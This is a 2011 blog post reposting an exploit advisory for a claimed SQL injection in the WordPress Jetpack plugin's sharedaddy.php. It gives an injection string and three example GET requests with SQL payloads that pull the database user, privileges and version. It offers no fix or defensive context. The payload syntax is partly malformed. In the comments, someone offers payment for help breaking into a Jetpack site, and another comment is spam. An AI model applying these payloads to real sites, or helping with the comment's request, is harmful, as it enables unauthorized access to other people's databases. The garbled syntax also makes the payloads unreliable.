Saturday, 19 November 2011

Wordpress Jetpack Plugin Vulnerable to SQL Injection 

Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
















Jetpack is a WordPress plugin that supercharges your self-hosted WordPress site with the awesome cloud power of WordPress.com.A SQL vulnerability have been found by longrifle0x in this plugin.



File: wp-content/plugins/jetpack/modules/sharedaddy.php

Exploit: id=-1; or 1=if

Exploitation:
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None'LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][MID((VERSION()),1,6)
Via - 1337day










Posted by



at






















Labels:
,
,


















2 comments:








  1. Unknown11 February 2014 at 07:04
    Im really want to gain access to a website using sharedaddy and jetpack. I lack the knowledge to perform this kind of exploitation myself, but im happy to pay anyone who could help me. If you can help me, and would like to earn little extra cash, please contact me at "nissej-at-ymail dot com. " 
    ReplyDelete
  2. WelderReview.com22 July 2019 at 10:52

    Hello,

    we provide affordable and result-oriented SEO services, please give a chance to serve you.


    Thanks
    Admin: E07.net
    ReplyDelete




























        

      









Subscribe to:
Post Comments (Atom)